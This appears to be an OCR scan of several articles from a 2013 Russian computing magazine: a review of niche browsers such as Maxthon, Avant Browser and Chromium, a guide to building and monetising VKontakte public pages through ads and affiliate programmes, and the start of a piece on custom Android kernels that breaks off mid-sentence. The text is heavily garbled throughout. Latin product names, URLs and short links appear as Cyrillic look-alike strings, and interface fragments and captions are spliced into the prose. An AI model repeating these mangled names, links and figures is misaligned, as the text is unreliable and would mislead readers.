е КРИЗИС и готоп взореатьсл.... 




В Россию 



и \ Ноем ЮМАМ 
Ц ѵѵжт.уагЮех.ги 



іИ яі тіимпіііпі іі * 



Не гм >ту пАнель мклмки, к которми котите иметь быстрый доступ. 




Одна из самых интересных и полезных функций СооІМоѵо — ІЕ ТаЬ — упрощает 
процесс тестирования в Шегпеі Ехріогег 





Дебввить коиментврмй 



чятггъ далее 



231 просиогр 
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Без рамки — Читаем с умом. Заправляемся контентом по полной 




Информация > это сипа, и с этим утворждемием вряд пи поспоришь Каждый день мы пропускаем через 1 

себя мегабайты попезного контента, разгребая і Ооодіе Реабег е многочисленные подписки на 

любимые сайты и блоги протокол Р38 вкупе с мощнейшим агрегатором е пице Ооодіе Реабег здорово вырузіают. но в 

современных реалиях их возможностей, увы. не хватает хочется попучать свежую информацию и при этом не думать, есть пи у 

тебя подписка на соответствующий Решением этой проблемы уже давно озадачились многочисленные разработчики, и сегодня 

мы можем сравнить и протестировать автоматизированных купинаров экзотической кухни с именем сКонтент» 

Как мы оценивали сервисы 



«■нишимнинннвншиммнн» Все расшотрениые • аатье меб^сервисы мы оценивали по нескольким критериям свежеаь найденного контента, наличие 
контента на ру^ом языке, доступность приложений для ЮЗ/Апбгоіб. возможность пользоваться сервисом через ^еЬ. 
интеграция с Соодіе Реабег и внешний вид критерий «интересность контента» рассчитывался на основании материалов для материалов, непосредавеннс^ 
связанных с ИТ Параметр «Свежесть материалов» оценивался на примере актуальности новостей. Зачастую сервисы предлагали к чтению «свежие» новое задания 
месячной давности, І Мой ПК 



Облако ""оаоефсй/іа 



3 гоммектария читать далее 350 просмотров 



Новость — МІСГ 050 ІІ: ликвидирует почтовый сервис НоітаіІ 

Опубликовано Еогб_о1_Геаг в ЧТ, 21/02/2013 • 18:51 




МАХТНОМ 

тахШоп.сот 

Аудитория проекта: 

любители «все включено» 
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Комбайн 
2,0 — теперь 
еще больше 
комбайна 






І Загрузитъ X О 



Переименовать Загрузить 



2 Закачек 



МахШоп — ОДИН ИЗ тех проектов, которые пережили второе 
рождение. Впервые он увидел свет в начале нулевых под 
псевдонимом МуІЕ. Тогда он представлял собой удобную 
обертку для ослика ІЕ и ряд полезных функций. У него был 
встроенный менеджер закачек, табы вместо отдельных окон 
и другие полезности. 

Когда начался бум Пге^ох, а впоследствии и Ооодіе СІіготе, 
МуІЕ был вынужден уйти в тень на капитальный ремонт. Тоталь- 
ная рихтовка вернула его с новым именем, обновленным набо- 
ром функций и совершенно другим лицом. 

Сегодня МахІІіоп больше похож на мощный интернет- центр, 
чем на просто браузер. Под капотом бродилки хостятся аж два 
движка — ѴѴеЬКіг и Тгісіеп! (используется в Іп^егпе^ Ехріогег). 
Причем в отличие от большинства подобных решений МахТІіоп 
способен самостоятельно определять страницы, для которых 
применение Тгібепі более предпочтительно (как правило, это 
старые сайты). Я специально достал из кладовки один старый 
проект, адаптированный для просмотра в ІЕ, и попробовал по- 
смотреть его МахІІіоп. Недолго думая, бродилка сразу пере- 
ключила отображение в ретрорежим и отрендерила страницу 
при помощи Тгісіепі. Помимо одновременной работы с двумя 
движками, наиболее сильные стороны МахІИоп составляют 
собственное облако и наличие версий под мобильные плат- 
формы (АпсІгоІб, і08). Собственная тучка не только позволяет 
складировать различную мелкую информацию вроде исто- 
рии посещений, списка открытых страниц и подобных вещей, 
но и вполне СГОДИТСЯ для хранения файлов. 

Например, меня очень порадовала возможность сохране- 
ния файлов с веб-страницы одним кликом в облако. Наиболее 
выгодно эта функция выглядит при работе на мобильнике/план- 
щете. На этом полезности МахІІіоп не кончаются, а скорей толь- 
ко начинаются. Среди них: 

• поддержка жестов; 

• функция ЗирегОгор, упрощающая взаимодействие 
с интерфейсом браузера при отсутствии мыши; 

• блокировщик рекламы; 

• полностью переработанный интерфейс приложения 
(не очередной клон СИготе); 

• одновременная обработка результатов поиска 
с нескольких поисковых серверов; 

• просмотр страниц в режиме для чтения 
(без лишней информации); 



• сохранение видео сУоиТиЬе; 

• отключение звука на любой странице; 

• одновременный просмотр нескольких 
вкладок в одном окне; 

• менеджер загрузки; 

• собственный магазин расширений; 

• установка произвольного времени 
обновления открытых страниц; 

• ночной режим серфинга. При активации данного режи- 
ма МахІІюп затемняет яркий фон страниц, позволяя тем 
самым снизить нагрузку на глаза; 

• повышенная производительность 

и многое другое. 

Вердикт: МахІИоп придется по душе как обычным пользова- 
телям, так и хардкорным гикам, ищущим новые приключения. 
Наличие версий под мобильные платформы и полноценное 
персональное облако — две ключевые функции, позволяющие 
МахШоп уделать многих конкурентов. Добавим к этому хоро- 
шую производительность, многочисленные победы в тестах 
на соблюдение веб-стандартов и получим практически идеаль- 
ный, но малоизвестный браузер. 

Расширения: 

• Ретрорежим (рендеринг страницы с помощью движка ІЕ). 
Плагин для Ооодіе СИготе: ІЕ ТаЬ ( аоо.а1/Ю4Ц| ): 

• Создание скриншотов. Плагин для Ооодіе СИгогпе: ѴѴеЬраде 
ЗсгеепЗІіоІ ( аоо.а1/7тЫ ): 

• Ночной режим . Плагин для Ооодіе СІіготе: Наскег Ѵізіоп 
( аоо.аІ/МсЗг т) или незаменимая штука Тигп Ше Удіііз 
( аоо.аІ/дОрѴѴЬ ) для комфортного просмотра видеороли- 
ков; 

• Хранилище паролей. Плагин для Ооодіе СІіготе: 

ІазІРазз ( ооо.аІ/оЬКЕЬ ): 

• Блокировщик рекламы. Плагин для Ооодіе СІіготе: 

АбВІоск ( ооо.оІ/МхгвР ): 

• Встроенный блокнот с возможностью хранения заметок 
в облаке. Плагин для Ооодіе СИготе: Мето Мо^ерасІ 
(0 00.01/46132 ): 

• Сниффер ресурсов. Плагин для Ооодіе СІіготе: 

\Л/еЬ Оеѵеіорег ( аоо.а1/4хЛ)Х ). 
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[ Онлійи хрвнилиіце: Войти 

^ ф Сомт СЫ*N » 

Открыть файлы... СЫ*0 

Отцепить вкладку 

ІЛІ Сохранить ► 

' Печать СМ*Р 

Масштаб > 

Поиск на »той странице.- СМ*Р 
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АѴАЫТ ВПОѴѴ8ЕР 

ІІРІ: \ллллл/.аѵап1Ьгоѵѵ5ег.сот 

Аудитория проекта: 

веб-разработчики 



Первоочередная цель разработчиков АѵаШ Вгоѵѵзег — предо- 
ставить пользователям простой способ совместить работу 
движков в рамках одного приложения. Казалось бы, задача 
не из легких, но, глядя на Аѵапі Вгоѵѵзег, убеждаешься в обрат- 
ном. Разработчики не только смогли собрать воедино все по- 
пулярные движки под одной оберткой, но и придумали легкий 
способ переключаться между ними. Смена движка рендеринга 
выполняется в пару кликов мышкой. 

На этом суперполезные функции кончаются, и остаются ти- 
пичные для подобных решений: 

• простенькое облачное хранилище, способное хранить В55- 
подписки, избранное, пароли и другую информацию: 

• блокировщик рекламы / всплывающих окон; 

• создание скриншотов страниц; 

• простенькая реализация управления жестами; 

• создание для страниц алиасов, при помощи которых можно 
быстро переходить на часто посещаемые сайты; 

• встроенная В55-читалка; 

• почтовый клиент. 

Вердикт: АѵаШ Вгоѵѵзег нельзя рассматривать в качестве пол- 
ноценного приложения для повседневного использования. Это 
больше специализированное решение, способное сослужить 
хорошую службу веб-разработчикам, но не обычному пользо- 
вателю. Каких-либо других интересных функций в Аѵапі Вгоѵѵзег 
попросту нет. 

Расширения: 

Рендеринг страницы при помощи движка Оеско. Плагин 
для (Зоодіе С^^^оте: МоііІІа Сеско ТаЬ ( ооо.о1/ОК1|Л : 

Читалка В88. Плагин для Соодіе СИготе: В88 Рееб Веабег 
(а оо.аІ/Вѵ54ѵ ): 

Автоматическое обновление страниц. Плагин для Соодіе 
СИготе: Аиіо Веігезіі РІиз ( аоо.оІ/д5Аі8 ). 



Первоочередная цель Аѵапі Вгошег — предо- 
ставить юзерам способ совместить работу 
движков в рамках одного приложения 



СНКОМШМ шш 

Аудитория проекта: любители всего свежего 

СІіготіит стал отцом множества бродилок, основан- 
ных на ѴѴеЬКіІ Он составляет фундамент почти каждо- 
го новоиспеченного браузера, и пошатнуть его доми- 
нирующее положение вряд ли возможно. 

Итак, ты наверняка уже знаешь, что именно на 
этом проекте обкатываются все новинки перед тем, 
как попасть в Соодіе СЬготе. Поддержка новых 
НТМ^5-фишек, исправление страшных багов, новин- 
ки интерфейса — все это в первую очередь получают 
пользователи СІіготіит. Увы, за частоту обновлений 
приходится платить стабильностью. Крупные пробле- 
мы, не позволяющие нормально работать с браузером, 
бывают редко, но метко. 

Выделить какие-то оригинальные интерфейсные 
фишки или возможности достаточно тяжело, так как 
они в большей мере представляют собой реализа- 
цию новых возможностей НТМ^5 и актуальны для веб- 
разработчиков, а не простых смертных. 

Тем не менее ряд отличий, способных заинтересо- 
вать простого пользователя, у СИготіит все же есть. 
Например: 

• отсутствует отправка отчетов об ошибках; 

• не выполняется передача Р1_2-идентификатора на 
серверы компании; 

• отсутствует Іірсіаіег, висящий в фоне; 

• поддерживаются только открытые и свободные ме- 
диаформаты ; 

• производительность очень высока. 

Вердикт: специальная версия Ооодіе Сітготе для 
энтузиастов и гиков. Все самое новое появляется 
именно здесь, и названным группам пользователей 
это однозначно придется по душе. Простым смертным 
СИготіит вряд ли подойдет, поскольку это продукт в 
первую очередь для испытаний. Да и мало найдется 
пользователей, жаждущих первыми протестировать, 
скажем, ВаПегуАРІ. 
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1 Спріме 


Вереи. 27ЛІ*29Л(18$М1) 



ВМ ЕСТО ЗАКЛ ЮЧ ЕН ИЯ 

Хотя о смерти нишевых браузеров заявляют чуть ли не каж- 
дый год, они продолжают развиваться. Все представленные 
в обзоре поделки обладают интересными и полезными функ- 
циями. Некоторые из них тривиальны, и нечто подобное мож- 
но найти в виде готовых расширений для Сііготе или Ріге^ох. 
Однако браузеры вроде МахІИоп поражают своим размахом 
и не позволяют сравнить их с банальным сборником плагинов, 
упакованных в более-менее симпатичный интерфейс. Простор 
для выбора колоссален, и тебе решать, может ли кто-то поме- 
ститься на твою скамейку запасных. 31 
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ПРОДАВАТЬ 

ДРУЗЕЙ 



Зарабатываем деньги 
на пабликах ВКонтакте 

Можно создавать сообщества ВКонтакте, чтобы 
обсуждать политику, сериалы и котиков. А можно 
еще и делать на этом деньги. Если в такой груп- 
пе набирается хотя бы 50 тысяч человек, то уже 
можно начинать размещать рекламу. Сообще- 
ство с численностью в 100 тысяч человек может 
приносить тебе доход в 50-70 тысяч рублей в ме- 
сяц. Интересно, не правда ли? 




Александр Фаронов 

а.е.^агопоѵ@атаіІ.сот 



ВМЕСТО ВСТУПЛЕНИЯ 

Заработок на сообществах — относительно мо- 
лодой бизнес, заниматься этим серьезно нача- 
ли в 2011 году. Толчком для развития послужили 
многочисленные инфобизнесмены, которые 
стали обращать внимание на то, что они дают ре- 
кламу своих продуктов в пабликах и это приносит 
результат. Позже интересоваться рекламой стали 
и различные интернет-магазины, консалтинговые 
агентства и просто всевозможные посредники 
товаров. Стало очевидно, что сообщества — эф- 
фективный инструмент для продвижения товаров 
и услуг и на этот инструмент обязательно будет 
хороший спрос. А раз есть спрос, то рождается 
и предложение :). 

СОЗДАНИЕ ПАВЛИКА 

Давай начнем с самого начала: почему наш выбор 
падает именно на паблик, а не на группу, в чем во- 
обще их различие? Различий на самом деле мало, 
основные — если у тебя группа, то ты можешь 
рассылать пригласительные сообщения о группе 
пользователям ВК, в паблике такого нет. При этом 
если у тебя паблик, то у вступивших в него на соб- 
ственной странице красиво отображается иконка 
паблика и это привлекает в него дополнительных 
пользователей. 

Теперь пройдемся по пунктам и посмотрим, 
что нужно для создания паблика. 

1. Тема паблика. Верный способ — выбрать 
какую-то развлекательную нишу, это гаран- 
тированно найдет свою аудиторию. Под раз- 
влекательными я понимаю те тематики, кото- 
рые не нагружают твоего посетителя излишне 
длинной и сложной информацией. Нужно быть 
проще: пиши об успехе, деньгах, мотива- 
ции, путешествиях, спорте, различных мемах 
и прочем. Увы, тут важно работать на массо- 
вость. Ты можешь попробовать создать пу- 
бличную страницу британской королевы и пи- 
сать туда только о ней — но не удивляйся, если 
такая страница не получит гигантского успеха. 
2 Обложка. «Ковер» отображается справа 
сверху, и на него в первую очередь падает 
взгляд твоего нового посетителя, поэтому 
к его дизайну надо подойти серьезно. Не- 
плохой вариант для начала — пойти на Тгее- 
Іапсе.гц и заказать себе обложку за 300-500 
рублей у профи этого дела или же найти 
подходящую картинку на платном фотосто- 
ке вроде зИиПегз^оск.сот . Ни в коем случае 
не воруй чужие обложки: посетители поймут, 
что ты клон, и больше не вернутся. Важный 
нюанс — будет замечательно, если на облож- 
ке внизу будет призыв подписаться в твой па- 
блик. Банально, но это работает. 

3. Контент. После дизайна самое время при- 
ступить к контенту. Лучше делать в среднем 
10-15 записей в день. Этим ты не будешь 
перегружать посетителей, и в то же время им 
будет что посмотреть. «А откуда контент-то 
брать?» — возможно, спросишь ты. Тут тоже 
все не так просто. Есть три варианта. Пер- 
вый — вступить в несколько пабликов схожей 





ХАКЕР 04/171/2013 



Как продавать друзей 



тематики, фильтровать их контент и постить (размещать) 
на свою стену. Второй — найти какой-либо сайт также схо- 
жей тематики и размещать части его контента (например, 
красивые картинки) у себя на стене. Ну и третий — все де- 
лать самому. Конечно, третий вариант предпочтительнее: 
пользователи будут видеть, что у тебя уникальные материа- 
лы, но, скорее всего, вначале это будет очень трудно реали- 
зовать — ты просто устанешь это делать постоянно. Кстати, 
если ты готовишь уникальные картинки в свое сообщество, 
то не забудь проставить на них водяные знаки с названием 
твоего паблика. Тогда все, кто будут копировать такие кар- 
тинки, волей-неволей будут приносить тебе дополнитель- 
ных посетителей. 

4. Автоматизация постинга. Понятное дело, что размещать 
контент вручную ты просто задолбаешься, поэтому необ- 
ходимо пользоваться так называемыми онлайн-сервисами 
автопостинга. Они позволяют заливать контент в заданное 
время на многие дни вперед (вплоть до месяца!). То есть 
все очень удобно — допустим, ты в начале месяца загрузил 
все свои посты в такой сервис, задал ему расписание, ког- 
да размещать, — и все, теперь на ближайшее время ты мо- 
жешь думать только о продвижении и/или монетизации сво- 
его паблика, а всю работу по размещению будет выполнять 
за тебя сервис. Примером таких сервисов могут служить 
знаменитые Зосіаіе и ВиггЫке. 

РАСКРУТКА ПАБЛИКА 

Итак, все организаторские работы сделаны, твой паблик соз- 
дан, имеет привлекательный дизайн и заряжен автопостом 
на несколько недель вперед. Что дальше? А дальше идет самая 
главная часть — раскрутка твоего паблика, то есть привлечение 
в него новых посетителей, которые будут подписываться. 

Первое, что может прийти в голову, когда речь идет о рас- 
крутке паблика, — это таргетированная реклама ВКонтакте. Фу! 
Остановись! Даже не думай это пробовать. По тестам, которые 
проводил не только я, такая реклама — это в 70% случаев пустая 
трата денег. Так что если ты никогда не видел рекламный каби- 
нет ВКонтакте, то и не советую туда заглядывать. В случае его 
использования цена за одного подписчика может превышать 
четыре рубля. Лучше давай познакомимся с более практичны- 
ми и эффективными методами. 

Рекламные посты в других сообществах. Вот тут уже мож- 
но остановиться поподробнее. Такая реклама приносит под- 
писчика по цене в среднем два-три рубля за одного человека. 
Это нормальная цена. Чтобы разместить свой рекламный пост 





Пример гармоничной 
тематической обложки 
для паблика 



Теперь ВКонтакте 
может сказать, сколько 
у тебя ботов! 




БЕСПЛАТНЫЙ МЕТОД РЕКЛАМЫ 

Есть и другой метод рекламы, бесплатный, — взаи- 
мообмен (или просто обмен). При таком методе тебе 
нужно найти паблики, которые стоят примерно на од- 
ном уровне с твоим пабликом, и договориться о постах 
о друг дружке либо размещении друг друга в ссылках. 
Размещение в ссылках — это тоже хороший инстру- 
мент для рекламы, главное, чтобы ты смотрел на то, 
не удалил ли тебя твой «товарищ» из своих ссылок. 
Только учти, что бесплатный метод раскрутки — это 
кропотливая работа, которая может занять у тебя мно- 
го времени, и иногда тебе будет казаться, что ты зани- 
маешься чем-то не тем. Это нормально. 



Боты в группе 

Процент подозрительных аккаунтов: приблизительно 1% 



Если у тебя уже есть 50 тысяч человек 
в паблике, то можно начать монетизацию! 



Пол / Возраст Показать б виде графиков 

15% 




до 18 от 18 до 21 от 21 до 24 от 24 до 27 от 27 до 30 от 30 до 35 от 35 до 45 от 45 



мужчины 19% 



женщины 



Обращай внимание на возраст своих читателей. Лучше, когда присутствует более взрослая аудитория 



В сообществе с «населением» примерно 100 
тысяч человек, нужно потратить примерно 300 
рублей. Нехитрые математические расчеты под- 
сказывают, что в таком случае к тебе в паблик 
подпишется человек 100-150. Согласись, это до- 
вольно неплохо. 

Но рекламироваться в чужом паблике нужно 
с умом. Ты должен придумать такой рекламный 
пост, который замотивирует пользователя перей- 
ти к тебе в паблик. Пост должен состоять из ин- 
тригующего текста и картинки. Например: 

Великий миллионер решил поделиться 
секретом своего успеха [риЫіс*номер 
твоего паблика* ) Продолжение можно 
узнать тут. ] 

Обрати внимание на вторую строчку. Ее 
ВК «скушает» как гиперссылку, то есть по клику 
на строчку «Продолжение можно узнать тут» поль- 
зователь перейдет в твой паблик, и если история 
будет действительно интересной и захватываю- 
щей, а дизайн и наполнение паблика привлека- 
тельными, то человек обязательно подпишется 
к тебе. 

Над таким постом-приманкой, конечно, при- 
дется подумать. Хорошо идут различные загадки, 
истории, интересные факты (например, «Узнай 
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семь причин, которые мешают тебе заработать 
миллион рублей» или «Эти десять книг должен 
прочесть каждый!»), недавно бойко стали появ- 
ляться приманки-анекдоты: чтобы человек мог 
дочитать анекдот до конца, ему нужно перейти 
в твое сообщество, — очень эффективная штука, 
только если твоя аудитория читающая :). Также 
хорошо работают различные посты-миксы, на- 
пример, классический пост «Сохрани себе на сте- 
ну этот пост, и у тебя появятся деньги» с картинкой 
денег можно преобразовать так, чтобы над кар- 
тинкой была еще какая-то увлекательная история, 
которая заинтересует человека перейти в твой 
паблик. В результате ты получишь много лайков 
и посетители будут сохранять у себя на стенке 
такую запись, а это привлечет еще и друзей этих 
посетителей тебе в паблик. 

Не в каждом паблике реклама будет полезной. 
На что нужно обратить внимание в первую оче- 
редь? Пройдемся по порядку. 

1 . В паблике, в котором ты хочешь отрекламить- 
ся, должно быть минимум 100 тысяч человек. 

2. Ты должен попросить посмотреть статисти- 
ку паблика (обычно ее дают по умолчанию). 
В статистике нам интересны несколько пун- 
ктов: охват, уникальные посетители и про- 
смотры и участники. Посмотри внимательно 
на охват — это количество тех посетителей, 
которые реально просматривают новости па- 
блика в своей ленте. Уникальные посетители 
покажут тебе, сколько именно человек захо- 
дит в паблик, а статистика по участникам со- 
общит, какое количество участников вступает 
в паблик каждый день. Чтобы не попасть в «не- 
качественный» паблик, отбирай те, в которых 
показатели охвата и посетителей максималь- 
но больщие, но при этом более-менее плав- 
ные (не должно быть слишком резких скачков 
в статистике. Обычные скачки — это нормаль- 
но, так как эти сообщества тоже реклами- 
руются). Количество вышедших участников 
не должно превышать количество вступив- 
ших, и идеально, если количество вступивших 
плавно растет изо дня в день. 

3. Паблик, в котором ты хочешь отрекламиться, 
должен иметь лайки, то есть должна быть вид- 
на активность пользователей. Если активность 
очень маленькая, то лучше поберечь свои 
деньги и выбрать другое сообщество. 



ИМПЕРИЯ 

ПАБЛИКОВ 



Когда ты уже раскрутишь 
один свой паблик хотя бы 
до 100 тысяч человек, сра- 
зу же создавай второй, по 
какой-то другой тематике. 
Фишка в том, что второй 
паблик раскрутить будет 
уже гораздо проще, чем ты 
раскручивал первый. 

Делается раскрутка 
второго паблика примерно 
так: ты со своего первого 
паблика периодически 
даешь рекламные посты на 
свой второй паблик, раз- 
мещаешь второй паблик 
в ссылках первого. Посте- 
пенно аудитория второго 
паблика начинает расти, и 
ты уже можешь договари- 
ваться о взаиморекламе 
с другими сообществами. 
То есть, если все будет 
сделано нормально, на 
раскрутку второго паблика 
ты не потратишь ни копей- 
ки, а давать оплачиваемой 
рекламы сможешь все 
больше и больше! 

Этот хинт с созданием 
других сообществ многие 
забывают, так как концен- 
трируются только на одном 
своем паблике. Аты не за- 
будь и охвати еще больше 
аудитории ВКонтакте :). 



Создание нового сообщества 



Название 

Название публичной страницыі 
Вид сообщества 
г руппа 

Подходит для дискуссий и обмена мнениями 
• Публичная страница 

Идеально для распространения новостей и информации 
Мероприятие 

Удобно для организации концертов и вечеринок 




Отмена 



С этого момента твой паблик начинает жить! 



ном на бирже. Вначале лучше подбирать те рекламные посты, 
которые ведут на какое-то другое сообщество, постарайся 
избегать предложений о рекламе с ссылками на другие сай- 
ты. Дело в том, что некоторые мошенники согласовывают ре- 
кламу на один сайт, а после того, как реклама вышла, делают 
подмену на другой сайт. Это может принести неприятности 
твоим подписчикам, и если такой рекламы у тебя будет много, 
то твое сообщество могут забанить в самом ВКонтакте. 

2. СРА-партнерки. СРА (созі рег асііоп — оплата за дей- 
ствия) — это хороший способ для рекламы на различные 
игры и товары. При этом платить тебе будут за то, что по- 
сетитель сделал какое-то действие (купил товар или заре- 
гистрировался в определенной игре). Лучшие партнерки — 
А01 и СіІуАсІз (смотри их в ссылках). А01 — это монстр СРА, 
в котором различных предложений просто уйма, СіІуАбз 
специализируется на большом количестве игр. Твоя зада- 
ча — зарегистрироваться в этих партнерках и найти инте- 
ресные варианты, которые ты сможешь прорекламировать 
у себя в паблике. Идеально подойдут игры, в которых тебе 
платят за то, что человек зарегистрировался в игре. Обычно 
одна регистрация стоит примерно 10-15 рублей, так что мо- 



I Закажи обложку для паблика на (гее-іапсе.ги, 
но не кради у других — это оттолкнет читателей 



Если все пройдет удачно и ты хорошо отрекла- 
мишься в нескольких пабликах, то каждый день 
к тебе будет добавляться в сообщество самостоя- 
тельно примерно 1% из твоего количества людей. 

МОНЕТИЗАЦИЯ 

У тебя уже есть 50 тысяч человек в твоем со- 
обществе, ты постоянно сгоняешь туда рекламу 
с других сообществ и делаешь взаимообмены 
с другими пабликами? Отлично! Теперь наконец- 
то можно подумать о монетизации. Тут есть не- 
сколько способов монетизации. 

1. Поиск различных бирж для монетизации. 
Здесь опять же подойдет Зосіаіе (смотри 
в ссылках), так как эта биржа постоянно раз- 
вивается и очень популярна. Тут все просто: 
тебе нужно зарегистрировать там свой па- 
блик и либо ждать, когда к тебе посыплются 
рекламные заявки, либо посмотреть, какие 
заявки оставляют различные рекламодатели 
в надежде на то, что ты откликнешься. Выбери 
подходящую заявку, оставь свое предложение, 
и вперед — ты заработаешь первые деньги! 
Только не забудь поместить тот рекламный 
пост, за который тебе заплатили, иначе риску- 
ешь остаться не только без денег, но еще и с ба- 



Эта колонка и отличает паблик 
от группы — здесь отображаются 
только паблики! 



I Интересные страницы 
12 страниц 



Журнал 'Твой успех!" 

Для успешных и 
-теплектузльных 

Шедевры рекламы 
Креатив — это оргазм мозга. 
Некоторые его испытывают, 
а некоторые имитируют. 



т 

© Дневник успеха 
е5 Уои Сап 

Давай приготовим! 
Подпишись» =) 



і 



Т гаѵеіег - путешествие по 
планете 

О нашей красивой планете, 
от КОТОРОЙ захватывает дух 



жешь посчитать сам, сколько денег ты заработаешь, если 
хотя бы половина твоей аудитории зарегистрируется. Будь 
внимателен: не все предложения от партнерских программ 
можно рекламировать в ВКонтакте, некоторые тематики за- 
прещены. Так что не забудь предварительно почитать прави- 
ла рекламы ВКонтакте — они небольшие, но ты будешь четко 
знать, что можно, а что нельзя. Если же нарушишь правила, 
то твой паблик могут забанить и весь твой труд по созданию 
и раскрутке может уйти коту под хвост. Сразу скажу, что игры 
рекламировать можно (по крайней мере, было можно, когда 
я писал статью), только если они не эротического характера. 
Каждое предложение в партнерке называется оффером, так 
что не пугайся этого странного слова :). 

3. Поиск самому. В Сети достаточно много различных ресур- 
сов, которые хотят, чтобы их отрекламировали ВКонтакте. 
Тут тебе нужно пройтись по различным интернет-магазинам 
и написать каждому свое предложение. Не загинай сильно 
цену, адекватно оцени стоимость рекламы в своем паблике. 
Показывай всегда свою статистику сообщества и расскажи 
о том, какой тематики твой паблик и какая аудитория преоб- 
ладает в нем. Интернет-магазины — это только один из ва- 
риантов, ты можешь предложить свои услуги различным 
консалтинговым компаниям, игровым агентствам и другим 
пабликам. Не стесняйся начинать диалог о рекламе и своем 
предложении, это обычное дело, и ничего специфического 
в этом нет. Будет идеально, если ты предложишь какую-то 
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Как продавать друзей 



43 



Перед рекламой в другом 
паблике обязательно попроси 
у его владельца статистику 



фишку, которой нет у твоих конкурентов (скидки на опре- 
деленный вид рекламы, дополнительные услуги, самосто- 
ятельное изготовление рекламных материалов). Если прой- 
дешься по большому количеству сайтов и пабликов, то будь 
уверен — кто-то обязательно согласится на рекламу. 

4. Поиск инфобизнесменов. Инфобизнес (торговля различны- 
ми тренингами, курсами, мануалами, книжками и прочим) 
растет как на дрожжах, и каждый уважающий себя инфобиз- 
несмен мечтает о том, чтобы прорекламировать свой продукт 
на большое количество аудитории. Паблик ВКонтакте может 
с легкостью предоставить эту возможность. Тебе нужно найти 
таких инфобизнесменов, которые торгуют чем-то, что схо- 
же по тематике с твоим пабликом. Например, если у тебя 
паблик об успехе, то стоит поискать бизнесменов, которые 
продают курсы по мотивации и заработку в Сети. Найти их 
очень просто — можно либо вступить в популярные паблики 
и посмотреть, кого они рекламируют, либо поискать на про- 
сторах интернета различных продавцов информации. Если 
твой паблик достаточно живой и популярный, то можешь быть 
уверен, что ты найдешь своего клиента. Конечно, можно и са- 
мому попробовать создать свой инфобизнес и продавать его 
через свой паблик, но это уже тема другой статьи :). 

Все эти способы действенны и шикарно работают. Если твой 
паблик уже имеет большую аудиторию, то, скорее всего, ре- 
кламодатели будут сами проситься к тебе на платную рекламу, 
а тебе останется только выбирать подходящие предложения. 

Не делай рекламу в своем паблике очень часто и на каких-то 
заоблачных условиях. Стандартное предложение — один час ре- 
кламный пост находится на стене на первом месте, а далее сме- 
щается под остальными постами. Через 24 часа пост удаляется. 
Рекламу такого рода вначале лучше давать не более трех раз 
в сутки, чтобы твоя аудитория не подумала, что паблик превра- 
тился в рекламное агентство. Позже можно увеличивать это ко- 
личество до 5-10 раз в сутки. Если рекламные материалы ты дол- 
жен будешь подготовить сам (как в случае с СРА-партнерками), 
то сделай так, чтобы материалы как-то соприкасались с тема- 
тикой паблика; картинка должна быть тематической или стили- 
зованной под общую тематику, текст тоже. Это позволит дать 
рекламу эффективнее, так как подписчики паблика увидят инди- 



^Сегодня до полуночи ещё действует скидка на курс от 
Алексея Полевского по заработку на партнерках - Формула 
денежного успеха. ІШр://теёіа-ехрегТ5.ги/Іп^о/киг5/2пр 

Подробнее о курсе ИПр://ѵк.сот/уоигт^оЫ2пе5?ѵ^=ѵ/аІІ- 
5658693_9741 

При покупке курса вы получаете доступ к закрытому форуму 
поддержки клиентов, где в любое время сможете получить 
еще больше ответов на свои вопросы. 




^ Ссылка тейіа-ехреіТз.ги 

три часа назад | Ответить 2 Мне нравится 3 



А вот и рекламный пост, за который тебе заплатят денежки : ) 




Биржа рекламы 
ВКонтакте с автопостом: 
зосіаіе.т 



Популярный автопост: 
Ьиггііке.ги 



Популярная партнерская 
программа: асП.ги 

Партнерская программа 
софферами-играми: 
сііѵасіз.ги 



ВВЕДЕНИЕ В БОТОЛОГИЮ 



Когда ты будещь раскручивать свой паблик, то наверняка 
столкнешься с различными предложениями по накручиванию 
подписчиков за смешные деньги (обычно меньше 50 копеек 
за одного подписчика). Это привлекательно, но давай рас- 
смотрим эту тему глубже. Смешные цены за подписчика могут 
достигаться только по трем причинам: 

1 . Используются сервисы по типу ѵѵттаіі.ги. На них людям 
за копейки дается задание, чтобы они вступили в твой па- 
блик. Естественно, такие вступившие будут проявлять ноль 
активности. 

2. Используются базы аккаунтов (краденых или зарегистри- 
рованных заранее). С помощью специальной программы 
такая база целиком вступает к тебе в паблик, а толку от по- 
добных подписчиков также ноль. 

3. Используются программы взаимного обмена, например ѴК 
Ьоі. Здесь тоже все не так сладко, ведь обмены происходят 
в основном «мертвыми» аккаунтами ВК, а следовательно, 
пользы от таких аккаунтов нет. 



Правила пользования 
ВКонтакте: 
ѵк.сотЛегтз 



Запомни: при раскрутке своего паблика лучше не обращаться 
к услугам различных программ-накрутчиков или сомнительных 
«продавцов подписчиков». Несомненно, и те и те принесут тебе 
подписчиков в паблик, но это будут просто пустые цифры, ко- 
торые не показывают никакой активности, то есть не нажимают 
на лайки и не рассказывают о паблике своим друзьям. Публич- 
ные страницы с такими подписчиками обречены на смерть. 



ВОТИВСЕ 

В заключение хочется сказать, что паблики и реклама ВКонтакте будут толь- 
ко расти и расти, а сейчас есть очень хорощий шанс занять уютное место 
в этой нише. Практика показывает, что с каждым годом цены на рекламу в со- 
обществах ВКонтакте потихоньку растут, и эта тенденция не даст обратного 
хода. Так что дерзай и успей сделать себе дополнительный источник дохода. 
В свою очередь, я желаю тебе успехов в этом деле и миллион подписчиков 
в твоем паблике! 






Х-МоЫІе 
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ОПЕРАЦИЯ 
НА СЕРДЦЕ 

ВЫБИРАЕМ КАСТОМНОЕ ЯДРО А 

ДЛЯ СВОЕГО АМОНОЮ-АППАРАТА 

■ ■ Евгений Зобнин 

апс1гоі05иееІ,г.и 



Мы уже не раз писали о кастомных прошив- 
ках, гооі-приложениях и альтернативных за- 
грузочных меню. Все это стандартные темы 
в сообществе АпРгоісІ-хакеров, однако, кроме 
всего перечисленного, существует еще такое 
понятие, как «кастомное ядро», которое может 
дать практически безграничные возможности 
управления смартфоном и его железом на са- 
мом низком уровне. В этой статье я расскажу, 
что это такое, зачем нужно и как выбрать пра- 
вильное кастомное ядро. 






СиЗТОМКЕНМЕЬ? 

Что такое кастомное ядро? Как мы все знаем, АпсІгоісІ пред- 
ставляет собой пирог, состоящий из трех базовых слоев: ядро 
Упих, набор низкоуровневых библиотек и сервисов и вирту- 
альная машина Оаіѵік, поверх которой работает графическая 
оболочка, высокоуровневые инструменты и сервисы, а также 
почти все приложения, установленные из маркета. Создате- 
ли большинства альтернативных кастомных прошивок обычно 
работают только с двумя верхними слоями, добавляя функции 
в графическую оболочку (например, кнопки в шторке), изменяя 
